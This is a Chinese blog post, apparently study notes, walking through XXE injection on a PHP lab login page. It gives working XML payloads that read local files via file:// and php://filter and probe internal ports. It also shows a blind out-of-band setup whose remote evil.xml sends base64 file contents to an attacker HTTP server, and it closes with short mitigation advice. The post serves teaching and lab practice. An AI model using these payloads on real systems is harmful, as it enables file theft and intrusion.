<p>步骤一：在登录界面输入账号密码并抓取数据包…</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2699750/1646714382184-ee7da977-178a-44f8-97b7-8b23b870e77b.png" alt="img"></p>
<p>步骤二：尝试读取本地文件…</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">XL</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY <span class="meta-keyword">fl</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;file:///d:/hacker.txt&quot;</span>&gt;</span>]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">user</span>&gt;</span><span class="tag">&lt;<span class="name">username</span>&gt;</span><span class="symbol">&amp;fl;</span><span class="tag">&lt;/<span class="name">username</span>&gt;</span><span class="tag">&lt;<span class="name">password</span>&gt;</span>123<span class="tag">&lt;/<span class="name">password</span>&gt;</span><span class="tag">&lt;/<span class="name">user</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2699750/1646714439621-7ff2aa14-58ad-438d-ae63-3d735d8241d1.png" alt="img"></p>
<p>步骤三：使用 PHP 伪协议读取文件…</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">XL</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY <span class="meta-keyword">fl</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;php://filter/read=convert.base64-encode/resource=d:/hacker.txt&quot;</span>&gt;</span>]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">user</span>&gt;</span><span class="tag">&lt;<span class="name">username</span>&gt;</span><span class="symbol">&amp;fl;</span><span class="tag">&lt;/<span class="name">username</span>&gt;</span><span class="tag">&lt;<span class="name">password</span>&gt;</span>123<span class="tag">&lt;/<span class="name">password</span>&gt;</span><span class="tag">&lt;/<span class="name">user</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2699750/1646715435359-4eff153e-84c0-408e-9604-d2c9cf1cf4c1.png" alt="img"></p>
<p>步骤四：探测内网存活主机与端口…</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">XL</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY <span class="meta-keyword">fl</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;http://127.0.0.1:80&quot;</span>&gt;</span>]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">user</span>&gt;</span><span class="tag">&lt;<span class="name">username</span>&gt;</span><span class="symbol">&amp;fl;</span><span class="tag">&lt;/<span class="name">username</span>&gt;</span><span class="tag">&lt;<span class="name">password</span>&gt;</span>123<span class="tag">&lt;/<span class="name">password</span>&gt;</span><span class="tag">&lt;/<span class="name">user</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2699750/1646715508225-34428105-2a93-4349-abf0-7dbc94787b0a.png" alt="img"></p>
<h3 id="二无回显的xxe"><a class="markdownIt-Anchor" href="#二无回显的xxe">#</a> 二：无回显的 XXE</h3>
<p>思路：写两个外部参数实体，第一个用来请求本地数据内容，第二个用 http 协议或者其他协议把请求到的数据作为参数带到我们的 vps，这样就实现了数据外带了。我们将 <code>doLogin.php</code>  源码中的输出代码注释掉，将错误信息也不显示…</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2699750/1646714604789-c723cbbd-6528-43a2-a4e6-f3c05c2ab7f7.png" alt="img"></p>
<p>步骤一：继续运行上面的 XML 语法，发现没有了数据回显…</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2699750/1646714672885-fcf67bcf-94f4-4460-80ed-10d2ea2dd35c.png" alt="img"></p>
<p>步骤二：在远程服务器上创建 <code>evil.xml</code>  文件并使用 Python 开启 http 服务…</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!ENTITY % <span class="meta-keyword">payload</span> <span class="meta-string">&quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#x27;http://192.168.1.84:8080/a.php?content=%file;&#x27;&gt;&quot;</span>&gt;</span> %payload;</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2699750/1646714773438-55f05428-fcbb-48ff-88ee-46f790a7eccc.png" alt="img"></p>
<p>注意：之所以要把 “%” 转成 html 实体编码是因为在实体的值中不能有 “%”，所以也就只能转成 <code>&amp;#x25</code>  了</p>
<p>步骤三：构造外部实体… 并进行访问…</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=&quot;1.0&quot;?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">test</span> [</span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY % <span class="meta-keyword">file</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;php://filter/read=convert.base64-encode/resource=d:/hacker.txt&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY % <span class="meta-keyword">dtd</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">&quot;http://192.168.1.84:8080/evil.xml&quot;</span>&gt;</span></span></span><br><span class="line"><span class="meta">%dtd;</span></span><br><span class="line"><span class="meta">%send;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2699750/1646714866287-a06c7c6e-44ae-483f-b89a-8a977eff1bd0.png" alt="img"></p>
<p>步骤四：回到 HTTP 服务器上发现数据已经带到请求日志上… 经 Base64 解码得出内容…</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2699750/1646714954808-86821c13-2f49-4c40-bd7a-ba97d99c75d9.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2022/png/2699750/1646715001864-cd2382dc-39b2-4540-81a0-365a46c63d36.png" alt="img"></p>
<h3 id="三漏洞修复"><a class="markdownIt-Anchor" href="#三漏洞修复">#</a> 三：漏洞修复</h3>
<ol>
<li>使用开发语言禁用外部实体；</li>
<li>过滤 SYSTEM/PUBLIC 等关键字；</li>
</ol>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2022-03-08 15:29:55" itemprop="dateModified" datetime="2022-03-08T15:29:55+08:00">2022-03-08</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="John Doe 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="John Doe 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="John Doe 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>John Doe <i class="ic i-at"><em>@</em></i>Hexo
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://sun-spots.github.io/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/XXE/" title="">https://sun-spots.github.io/2022/03/08/信息安全/第二阶段/第三周/XXE/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/SSRF/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva1.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipewf5l51j20zk0m8b29.jpg" title="未命名">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>未命名</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/linux%E5%8F%91%E5%B1%95%E4%B8%8E%E5%9F%BA%E7%A1%80/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva1.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gicmnywqgpj20zk0m8dwx.jpg" title="未命名">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>未命名</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AC%AC%E4%BA%94%E5%A4%A9xxe%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5"><span class="toc-number">1.</span> <span class="toc-text"> 第五天：XXE 实体注入</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xxe-%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="toc-number">2.</span> <span class="toc-text"> xxe 漏洞描述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xxe-%E6%BC%8F%E6%B4%9E%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90-1"><span class="toc-number">3.</span> <span class="toc-text"> xxe 漏洞代码分析 1</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xxe-%E6%BC%8F%E6%B4%9E%E4%BB%A3%E7%A0%81%E5%88%86%E6%9E%90-2"><span class="toc-number">4.</span> <span class="toc-text"> xxe 漏洞代码分析  2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%89%E5%9B%9E%E6%98%BE"><span class="toc-number">4.1.</span> <span class="toc-text"> 有回显</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#xxe-%E6%BC%8F%E6%B4%9E%E5%B8%B8%E7%94%A8%E5%88%A9%E7%94%A8%E5%A6%82%E4%B8%8B"><span class="toc-number">4.1.1.</span> <span class="toc-text"> xxe 漏洞常用利用如下</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%AF%BB%E5%8F%96%E6%95%8F%E6%84%9F%E6%96%87%E4%BB%B6"><span class="toc-number">4.1.1.1.</span> <span class="toc-text"> 读取敏感文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8-php-%E4%BC%AA%E5%8D%8F%E8%AE%AE-phpfilter-%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6"><span class="toc-number">4.1.1.2.</span> <span class="toc-text"> 使用 php 伪协议 php:&#x2F;&#x2F;filter 读取文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E5%86%85%E7%BD%91%E5%92%8C%E7%AB%AF%E5%8F%A3"><span class="toc-number">4.1.1.3.</span> <span class="toc-text"> 扫描内网和端口</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A0%E5%9B%9E%E6%98%BE"><span class="toc-number">4.2.</span> <span class="toc-text"> 无回显</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xxe-%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88"><span class="toc-number">5.</span> <span class="toc-text"> xxe 防御方案</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xxe-lab-for-php"><span class="toc-number">6.</span> <span class="toc-text"> XXE-Lab for PHP</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E6%9C%89%E5%9B%9E%E6%98%BE%E7%9A%84xxe"><span class="toc-number">6.0.1.</span> <span class="toc-text"> 一：有回显的 XXE</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C%E6%97%A0%E5%9B%9E%E6%98%BE%E7%9A%84xxe"><span class="toc-number">6.0.2.</span> <span class="toc-text"> 二：无回显的 XXE</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%89%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="toc-number">6.0.3.</span> <span class="toc-text"> 三：漏洞修复</span></a></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="John Doe"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">John Doe</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">37</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">3</span>
        <span class="name">分类</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/SSRF/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/linux%E5%8F%91%E5%B1%95%E4%B8%8E%E5%9F%BA%E7%A1%80/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web/" title="分类于 web前端">web前端</a>
</div>

    <span><a href="/2022/01/14/%E4%BF%AE%E6%94%B9/css%E6%A0%B7%E5%BC%8F%E3%80%81%E7%BB%A7%E6%89%BF%E3%80%81%E6%9D%83%E9%87%8D/" title="css样式、继承、权重">css样式、继承、权重</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%8B%EF%BC%89/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/01/19/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E5%B8%B8%E7%94%A8%E7%9F%A5%E8%AF%86/MSSQL%E5%AE%89%E8%A3%85/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/01/20/%E4%BF%AE%E6%94%B9/%E6%B5%AE%E5%8A%A8/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/03/02/%E4%BF%AE%E6%94%B9/XSS%E6%BC%8F%E6%B4%9E/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/%E8%BD%AF%E4%BB%B6%E5%8C%85%E7%AE%A1%E7%90%86%E4%B8%8E%E6%9D%83%E9%99%90%E7%AE%A1%E7%90%86/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/XXE/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/02/23/%E4%BF%AE%E6%94%B9/2.2.2%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/03/09/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E5%B8%B8%E7%94%A8%E7%9F%A5%E8%AF%86/%E4%BB%A3%E7%90%86%E6%B1%A0%E6%8A%80%E6%9C%AF/" title="未命名">未命名</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2022</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">John Doe @ Yume Shoka</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2022/03/08/信息安全/第二阶段/第三周/XXE/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
